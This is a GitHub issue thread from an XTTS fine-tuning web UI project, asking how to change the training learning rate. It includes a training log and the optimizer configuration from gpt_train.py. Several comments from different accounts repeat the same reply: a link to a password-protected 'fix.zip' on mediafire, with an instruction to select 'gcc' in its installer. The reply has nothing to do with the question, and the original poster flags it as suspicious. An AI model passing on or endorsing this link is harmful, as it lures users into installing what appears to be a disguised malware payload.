### ISSUE TITLE
current_lr: 5e-06 adjusting the learning rate to 3e-06 to increases more epochs and any improvements  ?

### ISSUE THREAD

**Issue by Imihaljko** [daswer123/xtts-finetune-webui#51]
Maybe someone know how to switch to different learning mode ?  
From current_lr: 5e-06 to 3e-60? 
Anyone know how to switch? and file location?

   --> TIME: 2024-08-25 22:49:14 -- STEP: 0/9 -- GLOBAL_STEP: 0
     | > loss_text_ce: 0.01781083643436432  (0.01781083643436432)
     | > loss_mel_ce: 4.666716575622559  (4.666716575622559)
     | > loss: 1.1711318492889404  (1.1711318492889404)
     | > current_lr: 5e-06
     | > step_time: 0.6752  (0.6751730442047119)
     | > loader_time: 58.0065  (58.00647807121277)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Imihaljko** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

REPORT

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Imihaljko** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

LOL  ccc .... LAME

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Imihaljko** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

SUS

**Comment by Imihaljko** [comment]
Utils/gpt_train.py 

  # Optimizer values like tortoise, pytorch implementation with modifications to not apply WD to non-weight parameters.
        optimizer="AdamW",
        optimizer_wd_only_on_weights=OPTIMIZER_WD_ONLY_ON_WEIGHTS,
        optimizer_params={"betas": [0.9, 0.96], "eps": 1e-8, "weight_decay": 1e-2},
        lr=5e-06,  # learning rate
        lr_scheduler="MultiStepLR",
        # it was adjusted accordly for the new step scheme
        lr_scheduler_params={"milestones": [50000 * 18, 150000 * 18, 300000 * 18], "gamma": 0.5, "last_epoch": -1},
        test_sentences=[],

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
